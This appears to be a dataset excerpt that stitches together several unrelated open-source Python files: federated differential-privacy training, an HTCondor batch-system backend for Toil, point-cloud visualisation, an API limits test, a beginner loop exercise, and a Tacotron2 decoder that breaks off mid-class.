file=os.path.join(root_folder, f),
original=self.name
)
)
def delete_filtered_images(self):
"""Delete all filtered images created from `self.name`."""
self.delete_matching_files_from_storage(
self.get_filtered_root_folder(),
filter_regex
)
def delete_sized_images(self):
"""Delete all sized images created from `self.name`."""
self.delete_matching_files_from_storage(
self.get_sized_root_folder(),
sizer_regex
)
def delete_filtered_sized_images(self):
"""Delete all filtered sized images created from `self.name`."""
self.delete_matching_files_from_storage(
self.get_filtered_sized_root_folder(),
filter_and_sizer_regex
)
def delete_all_created_images(self):
"""Delete all images created from `self.name`."""
self.delete_filtered_images()
self.delete_sized_images()
self.delete_filtered_sized_images()
| 1.992188 | 2 |
differential_privacy/run_federated.py | HanGuo97/federated | 330 | 5518 | # Copyright 2020, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs federated training with differential privacy on various tasks."""
import functools
from absl import app
from absl import flags
from absl import logging
import tensorflow as tf
import tensorflow_federated as tff
from utils import task_utils
from utils import training_utils
from utils import utils_impl
from utils.optimizers import optimizer_utils
with utils_impl.record_hparam_flags() as optimizer_flags:
# Defining optimizer flags
optimizer_utils.define_optimizer_flags('client')
optimizer_utils.define_optimizer_flags('server')
with utils_impl.record_hparam_flags() as shared_flags:
# Federated training hyperparameters
flags.DEFINE_integer('client_epochs_per_round', 1,
'Number of epochs in the client to take per round.')
flags.DEFINE_integer('client_batch_size', 20, 'Batch size on the clients.')
flags.DEFINE_integer('clients_per_round', 10,
'How many clients to sample per round.')
flags.DEFINE_integer('client_datasets_random_seed', 1,
'Random seed for client sampling.')
flags.DEFINE_integer(
'max_elements_per_client', None, 'Maximum number of '
'elements for each training client. If set to None, all '
'available examples are used.')
# Training loop configuration
flags.DEFINE_integer('total_rounds', 200, 'Number of total training rounds.')
flags.DEFINE_string(
'experiment_name', None, 'The name of this experiment. Will be append to '
'--root_output_dir to separate experiment results.')
flags.DEFINE_string('root_output_dir', '/tmp/fed_opt/',
'Root directory for writing experiment output.')
flags.DEFINE_integer(
'rounds_per_eval', 1,
'How often to evaluate the global model on the validation dataset.')
flags.DEFINE_integer(
'num_validation_examples', -1, 'The number of validation'
'examples to use. If set to -1, all available examples '
'are used.')
flags.DEFINE_integer('rounds_per_checkpoint', 50,
'How often to checkpoint the global model.')
with utils_impl.record_hparam_flags() as dp_flags:
# Differential privacy flags
flags.DEFINE_float(
'clip', None, 'Clip value for fixed clipping or initial clip for '
'adaptive clipping. If None, no clipping is used.')
flags.DEFINE_float('noise_multiplier', None,
'Noise multiplier. If None, non-DP aggregator is used.')
flags.DEFINE_float(
'adaptive_clip_learning_rate', None, 'Adaptive clip learning rate. If '
'None, clip adaptation is not used.')
flags.DEFINE_float('target_unclipped_quantile', 0.5,
'Target unclipped quantile.')
flags.DEFINE_boolean('uniform_weighting', False,
'Whether to weigh clients uniformly.')
# Task specification
with utils_impl.record_hparam_flags() as task_flags:
task_utils.define_task_flags()
FLAGS = flags.FLAGS
def _write_hparam_flags():
"""Returns an ordered dictionary of pertinent hyperparameter flags."""
hparam_dict = utils_impl.lookup_flag_values(shared_flags)
# Update with optimizer flags corresponding to the chosen optimizers.
opt_flag_dict = utils_impl.lookup_flag_values(optimizer_flags)
opt_flag_dict = optimizer_utils.remove_unused_flags('client', opt_flag_dict)
opt_flag_dict = optimizer_utils.remove_unused_flags('server', opt_flag_dict)
hparam_dict.update(opt_flag_dict)
# Update with task flags
task_flag_dict = utils_impl.lookup_flag_values(task_flags)
hparam_dict.update(task_flag_dict)
training_utils.write_hparams_to_csv(hparam_dict, FLAGS.root_output_dir,
FLAGS.experiment_name)
def main(argv):
if len(argv) > 1:
raise app.UsageError('Expected no command-line arguments, '
'got: {}'.format(argv))
client_optimizer_fn = optimizer_utils.create_optimizer_fn_from_flags('client')
server_optimizer_fn = optimizer_utils.create_optimizer_fn_from_flags('server')
train_client_spec = tff.simulation.baselines.ClientSpec(
num_epochs=FLAGS.client_epochs_per_round,
batch_size=FLAGS.client_batch_size,
max_elements=FLAGS.max_elements_per_client)
task = task_utils.create_task_from_flags(train_client_spec)
logging.info('Trainable weights:')
for weight in task.model_fn().trainable_variables:
logging.info('name: %s shape: %s', weight.name, weight.shape)
if FLAGS.uniform_weighting:
client_weighting = tff.learning.ClientWeighting.UNIFORM
elif FLAGS.task == 'shakespeare_character' or FLAGS.task == 'stackoverflow_word':
def client_weighting(local_outputs):
return tf.cast(tf.squeeze(local_outputs['num_tokens']), tf.float32)
else:
client_weighting = None
if FLAGS.noise_multiplier is None:
if FLAGS.uniform_weighting:
aggregation_factory = tff.aggregators.UnweightedMeanFactory()
else:
aggregation_factory = tff.aggregators.MeanFactory()
if FLAGS.clip is not None:
if FLAGS.clip <= 0:
raise ValueError('clip must be positive if clipping is enabled.')
if FLAGS.adaptive_clip_learning_rate is None:
clip = FLAGS.clip
else:
if FLAGS.adaptive_clip_learning_rate <= 0:
raise ValueError('adaptive_clip_learning_rate must be positive if '
'adaptive clipping is enabled.')
clip = tff.aggregators.PrivateQuantileEstimationProcess.no_noise(
initial_estimate=FLAGS.clip,
target_quantile=FLAGS.target_unclipped_quantile,
learning_rate=FLAGS.adaptive_clip_learning_rate)
aggregation_factory = tff.aggregators.clipping_factory(
clip, aggregation_factory)
else:
if not FLAGS.uniform_weighting:
raise ValueError(
'Differential privacy is only implemented for uniform weighting.')
if FLAGS.noise_multiplier <= 0:
raise ValueError('noise_multiplier must be positive if DP is enabled.')
if FLAGS.clip is None or FLAGS.clip <= 0:
raise ValueError('clip must be positive if DP is enabled.')
if FLAGS.adaptive_clip_learning_rate is None:
aggregation_factory = tff.aggregators.DifferentiallyPrivateFactory.gaussian_fixed(
noise_multiplier=FLAGS.noise_multiplier,
clients_per_round=FLAGS.clients_per_round,
clip=FLAGS.clip)
else:
if FLAGS.adaptive_clip_learning_rate <= 0:
raise ValueError('adaptive_clip_learning_rate must be positive if '
'adaptive clipping is enabled.')
aggregation_factory = tff.aggregators.DifferentiallyPrivateFactory.gaussian_adaptive(
noise_multiplier=FLAGS.noise_multiplier,
clients_per_round=FLAGS.clients_per_round,
initial_l2_norm_clip=FLAGS.clip,
target_unclipped_quantile=FLAGS.target_unclipped_quantile,
learning_rate=FLAGS.adaptive_clip_learning_rate)
iterative_process = tff.learning.build_federated_averaging_process(
model_fn=task.model_fn,
server_optimizer_fn=server_optimizer_fn,
client_weighting=client_weighting,
client_optimizer_fn=client_optimizer_fn,
model_update_aggregation_factory=aggregation_factory)
train_data = task.datasets.train_data.preprocess(
task.datasets.train_preprocess_fn)
training_process = (
tff.simulation.compose_dataset_computation_with_iterative_process(
train_data.dataset_computation, iterative_process))
training_selection_fn = functools.partial(
tff.simulation.build_uniform_sampling_fn(
train_data.client_ids, random_seed=FLAGS.client_datasets_random_seed),
size=FLAGS.clients_per_round)
test_data = task.datasets.get_centralized_test_data()
validation_data = test_data.take(FLAGS.num_validation_examples)
federated_eval = tff.learning.build_federated_evaluation(task.model_fn)
evaluation_selection_fn = lambda round_num: [validation_data]
def evaluation_fn(state, evaluation_data):
return federated_eval(state.model, evaluation_data)
program_state_manager, metrics_managers = training_utils.create_managers(
FLAGS.root_output_dir, FLAGS.experiment_name)
_write_hparam_flags()
state = tff.simulation.run_training_process(
training_process=training_process,
training_selection_fn=training_selection_fn,
total_rounds=FLAGS.total_rounds,
evaluation_fn=evaluation_fn,
evaluation_selection_fn=evaluation_selection_fn,
rounds_per_evaluation=FLAGS.rounds_per_eval,
program_state_manager=program_state_manager,
rounds_per_saving_program_state=FLAGS.rounds_per_checkpoint,
metrics_managers=metrics_managers)
test_metrics = federated_eval(state.model, [test_data])
for metrics_manager in metrics_managers:
metrics_manager.release(test_metrics, FLAGS.total_rounds + 1)
if __name__ == '__main__':
app.run(main)
| 1.796875 | 2 |
waymo_kitti_converter/tools/visual_point_cloud.py | anhvth/Pseudo_Lidar_V2 | 0 | 5519 | import open3d as o3d
import numpy as np
pc_load_pathname = '/home/caizhongang/github/waymo_kitti_converter/007283-000.bin'
pc = np.fromfile(pc_load_pathname, dtype=np.float32).reshape(-1, 3)
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(pc)
axis = o3d.geometry.TriangleMesh.create_coordinate_frame(size=1, origin=[0,0,0])
visual = [pcd, axis]
o3d.visualization.draw_geometries(visual)
| 2.15625 | 2 |
designate-8.0.0/designate/tests/test_api/test_v2/test_limits.py | scottwedge/OpenStack-Stein | 145 | 5520 | <reponame>scottwedge/OpenStack-Stein
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Author: <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from designate.tests.test_api.test_v2 import ApiV2TestCase
class ApiV2LimitsTest(ApiV2TestCase):
def test_get_limits(self):
response = self.client.get('/limits/')
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('max_zones', response.json)
self.assertIn('max_zone_records', response.json)
self.assertIn('max_zone_recordsets',
response.json)
self.assertIn('max_recordset_records',
response.json)
self.assertIn('min_ttl', response.json)
self.assertIn('max_zone_name_length',
response.json)
self.assertIn('max_recordset_name_length',
response.json)
self.assertIn('max_page_limit',
response.json)
absolutelimits = response.json
self.assertEqual(cfg.CONF.quota_zones, absolutelimits['max_zones'])
self.assertEqual(cfg.CONF.quota_zone_records,
absolutelimits['max_zone_recordsets'])
self.assertEqual(cfg.CONF['service:central'].min_ttl,
absolutelimits['min_ttl'])
self.assertEqual(cfg.CONF['service:central'].max_zone_name_len,
absolutelimits['max_zone_name_length'])
self.assertEqual(cfg.CONF['service:central'].max_recordset_name_len,
absolutelimits['max_recordset_name_length'])
self.assertEqual(cfg.CONF['service:api'].max_limit_v2,
absolutelimits['max_page_limit'])
| 2.140625 | 2 |
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py | alexus37/AugmentedRealityChess | 1 | 5521 | """node-path implementation for OpenGLContext
"""
from vrml.vrml97 import nodepath, nodetypes
from vrml.cache import CACHE
from OpenGLContext import quaternion
from OpenGL.GL import glMultMatrixf
class _NodePath( object ):
"""OpenGLContext-specific node-path class
At the moment this only adds a single method,
transform() which traverses the path, calling
transform() for each Transforming node which
has a transform method.
"""
__slots__ = ()
def transform( self, mode=None, translate=1, scale=1, rotate=1 ):
"""For each Transforming node, do OpenGL transform
Does _not_ push-pop matrices, so do that before
if you want to save your current matrix. This method
is useful primarily for storing paths to, for instance,
bindable nodes, where you want to be able to rapidly
transform down to the node, without needing a full
traversal of the scenegraph.
"""
matrix = self.transformMatrix(
translate=translate, scale=scale, rotate=rotate
)
glMultMatrixf(
matrix
)
def quaternion( self ):
"""Get summary quaternion for all rotations in stack"""
nodes = [
node
for node in self
if (
isinstance(node, nodetypes.Transforming) and
hasattr( node, "orientation")
)
]
q = quaternion.Quaternion()
for node in nodes:
q = q * quaternion.fromXYZR( *node.orientation )
return q
class NodePath( _NodePath, nodepath.NodePath ):
pass
class WeakNodePath( _NodePath, nodepath.WeakNodePath ):
pass
| 2.640625 | 3 |
part01_basic/for_while_loop.py | ApprenticeOne/python_learn | 0 | 5522 | import random
from math import sqrt
sum = 0
for x in range(101):
sum += x
print(sum)
'''
range(101) 0-100 一共101个数
range(1,101) 1-100
range(1,101,2) 1-100间的奇数 步长为2
range(100,0,-2) 100-0间的偶数 步长为-2
'''
sum = 0
for x in range(100, 0, -2):
sum += x
print(sum)
# while
# 0-100间的随机数
answer = random.randint(0, 100)
count = 0
while True:
count += 1
number = int(input("Please enter the number: "))
if number < answer:
print("more larger")
elif number > answer:
print("more smaller")
else:
print("right")
print('you got d% times to get right answer' % count)
for i in range(1, 10):
for j in range(1, i + 1):
print('%d*%d=%d' % (i, j, i * j), end='\t')
print()
# 输入一个正整数判断是不是素数
num = int(input('请输入一个正整数: '))
end = int(sqrt(num))
is_prime = True
# 为什么要放一个end 如果这个数有一个小于sqrt的因数
# 就一定会有一个大于sqrt的因数与之对应
for x in range(2, end + 1):
if num % x == 0:
is_prime = False
break
if is_prime and num != 1:
print('%d是素数' % num)
else:
print('%d不是素数' % num)
| 3.78125 | 4 |
src/toil/batchSystems/htcondor.py | ElementGenomicsInc/toil | 2 | 5523 | <filename>src/toil/batchSystems/htcondor.py
# Copyright (C) 2018, HTCondor Team, Computer Sciences Department,
# University of Wisconsin-Madison, WI.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from builtins import str
import sys
import os
import logging
import time
import math
from toil.batchSystems.abstractGridEngineBatchSystem import AbstractGridEngineBatchSystem
import htcondor
import classad
logger = logging.getLogger(__name__)
class HTCondorBatchSystem(AbstractGridEngineBatchSystem):
# When using HTCondor, the Schedd handles scheduling
class Worker(AbstractGridEngineBatchSystem.Worker):
# Override the createJobs method so that we can use htcondor.Submit objects
# and so that we can get disk allocation requests and ceil the CPU request.
def createJobs(self, newJob):
activity = False
if newJob is not None:
self.waitingJobs.append(newJob)
# Queue jobs as necessary:
while len(self.waitingJobs) > 0:
activity = True
jobID, cpu, memory, disk, jobName, command = self.waitingJobs.pop(0)
# Prepare the htcondor.Submit object
submitObj = self.prepareSubmission(cpu, memory, disk, jobID, jobName, command)
logger.debug("Submitting %r", submitObj)
# Submit job and get batch system ID (i.e. the ClusterId)
batchJobID = self.submitJob(submitObj)
logger.debug("Submitted job %s", str(batchJobID))
# Store dict for mapping Toil job ID to batch job ID
# TODO: Note that this currently stores a tuple of (batch system
# ID, Task), but the second value is None by default and doesn't
# seem to be used
self.batchJobIDs[jobID] = (batchJobID, None)
# Add to queue of queued ("running") jobs
self.runningJobs.add(jobID)
# Add to allocated resources
self.allocatedCpus[jobID] = int(math.ceil(cpu))
return activity
def prepareSubmission(self, cpu, memory, disk, jobID, jobName, command):
# Convert resource requests
cpu = int(math.ceil(cpu)) # integer CPUs
memory = float(memory)/1024 # memory in KB
disk = float(disk)/1024 # disk in KB
# Workaround for HTCondor Python bindings Unicode conversion bug
command = command.encode('utf-8')
# Execute the entire command as /bin/sh -c "command"
# TODO: Transfer the jobStore directory if using a local file store with a relative path.
submit_parameters = {
'executable': '/bin/sh',
'transfer_executable': 'False',
'arguments': '''"-c '{0}'"'''.format(command),
'environment': self.getEnvString(),
'request_cpus': '{0}'.format(cpu),
'request_memory': '{0:.3f}KB'.format(memory),
'request_disk': '{0:.3f}KB'.format(disk),
'leave_in_queue': '(JobStatus == 4)',
'+IsToilJob': 'True',
'+ToilJobID': '{0}'.format(jobID),
'+ToilJobName': '"{0}"'.format(jobName),
'+ToilJobKilled': 'False',
}
# Return the Submit object
return htcondor.Submit(submit_parameters)
def submitJob(self, submitObj):
# Queue the job using a Schedd transaction
schedd = self.connectSchedd()
with schedd.transaction() as txn:
batchJobID = submitObj.queue(txn)
# Return the ClusterId
return batchJobID
def getRunningJobIDs(self):
# Get all Toil jobs that are running
requirements = '(JobStatus == 2) && (IsToilJob)'
projection = ['ClusterId', 'ToilJobID', 'EnteredCurrentStatus']
schedd = self.connectSchedd()
ads = schedd.xquery(requirements = requirements,
projection = projection)
# Only consider the Toil jobs that are part of this workflow
batchJobIDs = [batchJobID for (batchJobID, task) in self.batchJobIDs.values()]
job_runtimes = {}
for ad in ads:
batchJobID = int(ad['ClusterId'])
jobID = int(ad['ToilJobID'])
if not (batchJobID in batchJobIDs):
continue
# HTCondor stores the start of the runtime as a Unix timestamp
runtime = time.time() - ad['EnteredCurrentStatus']
job_runtimes[jobID] = runtime
return job_runtimes
def killJob(self, jobID):
batchJobID = self.batchJobIDs[jobID][0]
logger.debug("Killing HTCondor job {0}".format(batchJobID))
# Set the job to be killed when its exit status is checked
schedd = self.connectSchedd()
job_spec = '(ClusterId == {0})'.format(batchJobID)
schedd.edit(job_spec, 'ToilJobKilled', 'True')
def getJobExitCode(self, batchJobID):
logger.debug("Getting exit code for HTCondor job {0}".format(batchJobID))
status = {
1: 'Idle',
2: 'Running',
3: 'Removed',
4: 'Completed',
5: 'Held',
6: 'Transferring Output',
7: 'Suspended'
}
requirements = '(ClusterId == {0})'.format(batchJobID)
projection = ['JobStatus', 'ToilJobKilled', 'ExitCode',
'HoldReason', 'HoldReasonSubCode']
schedd = self.connectSchedd()
ads = schedd.xquery(requirements = requirements, projection = projection)
# Make sure a ClassAd was returned
try:
ad = ads.next()
except StopIteration:
logger.error(
"No HTCondor ads returned using constraint: {0}".format(requirements))
raise
# Make sure only one ClassAd was returned
try:
ads.next()
except StopIteration:
pass
else:
logger.warning(
"Multiple HTCondor ads returned using constraint: {0}".format(requirements))
if ad['ToilJobKilled']:
logger.debug("HTCondor job {0} was killed by Toil".format(batchJobID))
# Remove the job from the Schedd and return 1
job_spec = 'ClusterId == {0}'.format(batchJobID)
schedd.act(htcondor.JobAction.Remove, job_spec)
return 1
elif status[ad['JobStatus']] == 'Completed':
logger.debug("HTCondor job {0} completed with exit code {1}".format(
batchJobID, ad['ExitCode']))
# Remove the job from the Schedd and return its exit code
job_spec = 'ClusterId == {0}'.format(batchJobID)
schedd.act(htcondor.JobAction.Remove, job_spec)
return int(ad['ExitCode'])
elif status[ad['JobStatus']] == 'Held':
logger.error("HTCondor job {0} was held: '{1} (sub code {2})'".format(
batchJobID, ad['HoldReason'], ad['HoldReasonSubCode']))
# Remove the job from the Schedd and return 1
job_spec = 'ClusterId == {0}'.format(batchJobID)
schedd.act(htcondor.JobAction.Remove, job_spec)
return 1
else: # Job still running or idle or doing something else
logger.debug("HTCondor job {0} has not completed (Status: {1})".format(
batchJobID, status[ad['JobStatus']]))
return None
"""
Implementation-specific helper methods
"""
def connectSchedd(self):
'''Connect to HTCondor Schedd and return a Schedd object'''
condor_host = os.getenv('TOIL_HTCONDOR_COLLECTOR')
schedd_name = os.getenv('TOIL_HTCONDOR_SCHEDD')
# If TOIL_HTCONDOR_ variables are set, use them to find the Schedd
if condor_host and schedd_name:
logger.debug(
"Connecting to HTCondor Schedd {0} using Collector at {1}".format(
schedd_name, condor_host))
try:
schedd_ad = htcondor.Collector(condor_host).locate(
htcondor.DaemonTypes.Schedd, schedd_name)
except IOError:
logger.error(
"Could not connect to HTCondor Collector at {0}".format(condor_host))
raise
except ValueError:
logger.error(
"Could not find HTCondor Schedd with name {0}".format(schedd_name))
raise
else:
schedd = htcondor.Schedd(schedd_ad)
# Otherwise assume the Schedd is on the local machine
else:
logger.debug("Connecting to HTCondor Schedd on local machine")
schedd = htcondor.Schedd()
# Ping the Schedd to make sure it's there and responding
try:
schedd.xquery(limit = 0)
except RuntimeError:
logger.error("Could not connect to HTCondor Schedd")
raise
return schedd
def getEnvString(self):
'''Build an environment string that a HTCondor Submit object can use.
For examples of valid strings, see:
http://research.cs.wisc.edu/htcondor/manual/current/condor_submit.html#man-condor-submit-environment
'''
env_items = []
if self.boss.environment:
for key, value in self.boss.environment.items():
# Each variable should be in the form of <key>='<value>'
env_string = key + "="
# The entire value should be encapsulated in single quotes
# Quote marks (single or double) that are part of the value should be duplicated
env_string += "'" + value.replace("'", "''").replace('"', '""') + "'"
env_items.append(env_string)
# The entire string should be encapsulated in double quotes
# Each variable should be separated by a single space
return '"' + ' '.join(env_items) + '"'
# Override the issueBatchJob method so HTCondor can be given the disk request
def issueBatchJob(self, jobNode):
# Avoid submitting internal jobs to the batch queue, handle locally
localID = self.handleLocalJob(jobNode)
if localID:
return localID
else:
self.checkResourceRequest(jobNode.memory, jobNode.cores, jobNode.disk)
jobID = self.getNextJobID()
self.currentJobs.add(jobID)
# Add the jobNode.disk and jobNode.jobName to the job tuple
self.newJobsQueue.put((jobID, jobNode.cores, jobNode.memory, jobNode.disk, jobNode.jobName, jobNode.command))
logger.debug("Issued the job command: %s with job id: %s ", jobNode.command, str(jobID))
return jobID
@classmethod
def obtainSystemConstants(cls):
# Since it's not always clear what the max cpus and max memory available
# in an HTCondor slot might be, use some reasonable constants for now.
# TODO: Use a htcondor.Collector().query() to determine reasonable values.
max_cpu = 4
max_mem = 4e9
return max_cpu, max_mem
| 2.140625 | 2 |
paddlespeech/t2s/modules/tacotron2/decoder.py | alanlv/PaddleSpeech | 0 | 5524 | <gh_stars>0
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modified from espnet(https://github.com/espnet/espnet)
"""Tacotron2 decoder related modules."""
import paddle
import paddle.nn.functional as F
import six
from paddle import nn
from paddlespeech.t2s.modules.tacotron2.attentions import AttForwardTA
class Prenet(nn.Layer):
"""Prenet module for decoder of Spectrogram prediction network.
This is a module of Prenet in the decoder of Spectrogram prediction network,
which described in `Natural TTS
Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`_.
The Prenet preforms nonlinear conversion
of inputs before input to auto-regressive lstm,
which helps to learn diagonal attentions.
Notes
----------
This module alway applies dropout even in evaluation.
See the detail in `Natural TTS Synthesis by
Conditioning WaveNet on Mel Spectrogram Predictions`_.
.. _`Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`:
https://arxiv.org/abs/1712.05884
"""
def __init__(self, idim, n_layers=2, n_units=256, dropout_rate=0.5):
"""Initialize prenet module.
Parameters
----------
idim : int
Dimension of the inputs.
odim : int
Dimension of the outputs.
n_layers : int, optional
The number of prenet layers.
n_units : int, optional
The number of prenet units.
"""
super().__init__()
self.dropout_rate = dropout_rate
self.prenet = nn.LayerList()
for layer in six.moves.range(n_layers):
n_inputs = idim if layer == 0 else n_units
self.prenet.append(
nn.Sequential(nn.Linear(n_inputs, n_units), nn.ReLU()))
def forward(self, x):
"""Calculate forward propagation.
Parameters
----------
x : Tensor
Batch of input tensors (B, ..., idim).
Returns
----------
Tensor
Batch of output tensors (B, ..., odim).
"""
for i in six.moves.range(len(self.prenet)):
# F.dropout 引入了随机, tacotron2 的 dropout 是不能去掉的
x = F.dropout(self.prenet[i](x))
return x
class Postnet(nn.Layer):
"""Postnet module for Spectrogram prediction network.
This is a module of Postnet in Spectrogram prediction network,
which described in `Natural TTS Synthesis by
Conditioning WaveNet on Mel Spectrogram Predictions`_.
The Postnet predicts refines the predicted
Mel-filterbank of the decoder,
which helps to compensate the detail sturcture of spectrogram.
.. _`Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`:
https://arxiv.org/abs/1712.05884
"""
def __init__(
self,
idim,
odim,
n_layers=5,
n_chans=512,
n_filts=5,
dropout_rate=0.5,
use_batch_norm=True, ):
"""Initialize postnet module.
Parameters
----------
idim : int
Dimension of the inputs.
odim : int
Dimension of the outputs.
n_layers : int, optional
The number of layers.
n_filts : int, optional
The number of filter size.
n_units : int, optional
The number of filter channels.
use_batch_norm : bool, optional
Whether to use batch normalization..
dropout_rate : float, optional
Dropout rate..
"""
super().__init__()
self.postnet = nn.LayerList()
for layer in six.moves.range(n_layers - 1):
ichans = odim if layer == 0 else n_chans
ochans = odim if layer == n_layers - 1 else n_chans
if use_batch_norm:
self.postnet.append(
nn.Sequential(
nn.Conv1D(
ichans,
ochans,
n_filts,
stride=1,
padding=(n_filts - 1) // 2,
bias_attr=False, ),
nn.BatchNorm1D(ochans),
nn.Tanh(),
nn.Dropout(dropout_rate), ))
else:
self.postnet.append(
nn.Sequential(
nn.Conv1D(
ichans,
ochans,
n_filts,
stride=1,
padding=(n_filts - 1) // 2,
bias_attr=False, ),
nn.Tanh(),
nn.Dropout(dropout_rate), ))
ichans = n_chans if n_layers != 1 else odim
if use_batch_norm:
self.postnet.append(
nn.Sequential(
nn.Conv1D(
ichans,
odim,
n_filts,
stride=1,
padding=(n_filts - 1) // 2,
bias_attr=False, ),
nn.BatchNorm1D(odim),
nn.Dropout(dropout_rate), ))
else:
self.postnet.append(
nn.Sequential(
nn.Conv1D(
ichans,
odim,
n_filts,
stride=1,
padding=(n_filts - 1) // 2,
bias_attr=False, ),
nn.Dropout(dropout_rate), ))
def forward(self, xs):
"""Calculate forward propagation.
Parameters
----------
xs : Tensor
Batch of the sequences of padded input tensors (B, idim, Tmax).
Returns
----------
Tensor
Batch of padded output tensor. (B, odim, Tmax).
"""
for i in six.moves.range(len(self.postnet)):
xs = self.postnet[i](xs)
return xs
class ZoneOutCell(nn.Layer):
"""ZoneOut Cell module.
This is a module of zoneout described in
`Zoneout: Regularizing RNNs by Randomly Preserving Hidden Activations`_.
This code is modified from `eladhoffer/seq2seq.pytorch`_.
Examples
----------
>>> lstm = paddle.nn.LSTMCell(16, 32)
>>> lstm = ZoneOutCell(lstm, 0.5)
.. _`Zoneout: Regularizing RNNs by Randomly Preserving Hidden Activations`:
https://arxiv.org/abs/1606.01305
.. _`eladhoffer/seq2seq.pytorch`:
https://github.com/eladhoffer/seq2seq.pytorch
"""
def __init__(self, cell, zoneout_rate=0.1):
"""Initialize zone out cell module.
Parameters
----------
cell : nn.Layer:
Paddle recurrent cell module
e.g. `paddle.nn.LSTMCell`.
zoneout_rate : float, optional
Probability of zoneout from 0.0 to 1.0.
"""
super().__init__()
self.cell = cell
self.hidden_size = cell.hidden_size
self.zoneout_rate = zoneout_rate
if zoneout_rate > 1.0 or zoneout_rate < 0.0:
raise ValueError(
"zoneout probability must be in the range from 0.0 to 1.0.")
def forward(self, inputs, hidden):
"""Calculate forward propagation.
Parameters
----------
inputs : Tensor
Batch of input tensor (B, input_size).
hidden : tuple
- Tensor: Batch of initial hidden states (B, hidden_size).
- Tensor: Batch of initial cell states (B, hidden_size).
Returns
----------
Tensor
Batch of next hidden states (B, hidden_size).
tuple:
- Tensor: Batch of next hidden states (B, hidden_size).
- Tensor: Batch of next cell states (B, hidden_size).
"""
# we only use the second output of LSTMCell in paddle
_, next_hidden = self.cell(inputs, hidden)
next_hidden = self._zoneout(hidden, next_hidden, self.zoneout_rate)
# to have the same output format with LSTMCell in paddle
return next_hidden[0], next_hidden
def _zoneout(self, h, next_h, prob):
# apply recursively
if isinstance(h, tuple):
num_h = len(h)
if not isinstance(prob, tuple):
prob = tuple([prob] * num_h)
return tuple(
[self._zoneout(h[i], next_h[i], prob[i]) for i in range(num_h)])
if self.training:
mask = paddle.bernoulli(paddle.ones([*paddle.shape(h)]) * prob)
return mask * h + (1 - mask) * next_h
else:
return prob * h + (1 - prob) * next_h
class Decoder(nn.Layer):
"""Decoder module of Spectrogram prediction network.
This is a module of decoder of Spectrogram prediction network in Tacotron2,
which described in `Natural TTS
Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`_.
The decoder generates the sequence of
features from the sequence of the hidden states.
.. _`Natural TTS Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`:
https://arxiv.org/abs/1712.05884
"""
def __init__(
self,
idim,
odim,
att,
dlayers=2,
dunits=1024,
prenet_layers=2,
prenet_units=256,
postnet_layers=5,
postnet_chans=512,
postnet_filts=5,
output_activation_fn=None,
cumulate_att_w=True,
use_batch_norm=True,
use_concate=True,
dropout_rate=0.5,
zoneout_rate=0.1,
reduction_factor=1, ):
"""Initialize Tacotron2 decoder module.
Parameters
----------
idim : int
Dimension of the inputs.
odim : int
Dimension of the outputs.
att nn.Layer
Instance of attention class.
dlayers int, optional
The number of decoder lstm layers.
dunits : int, optional
The number of decoder lstm units.
prenet_layers : int, optional
The number of prenet layers.
prenet_units : int, optional
The number of prenet units.
postnet_layers : int, optional
The number of postnet layers.
postnet_filts : int, optional
The number of postnet filter size.
postnet_chans : int, optional
The number of postnet filter channels.
output_activation_fn : nn.Layer, optional
Activation function for outputs.
cumulate_att_w : bool, optional
Whether to cumulate previous attention weight.
use_batch_norm : bool, optional
Whether to use batch normalization.
use_concate : bool, optional
Whether to concatenate encoder embedding with decoder lstm outputs.
dropout_rate : float, optional
Dropout rate.
zoneout_rate : float, optional
Zoneout rate.
reduction_factor : int, optional
Reduction factor.
"""
super().__init__()
# store the hyperparameters
self.idim = idim
self.odim = odim
self.att = att
self.output_activation_fn = output_activation_fn
self.cumulate_att_w = cumulate_att_w
self.use_concate = use_concate
self.reduction_factor = reduction_factor
# check attention type
if isinstance(self.att, AttForwardTA):
self.use_att_extra_inputs = True
else:
self.use_att_extra_inputs = False
# define lstm network
prenet_units = prenet_units if prenet_layers != 0 else odim
self.lstm = nn.LayerList()
for layer in six.moves.range(dlayers):
iunits = idim + prenet_units if layer == 0 else dunits
lstm = nn.LSTMCell(iunits, dunits)
if zoneout_rate > 0.0:
lstm = ZoneOutCell(lstm, zoneout_rate)
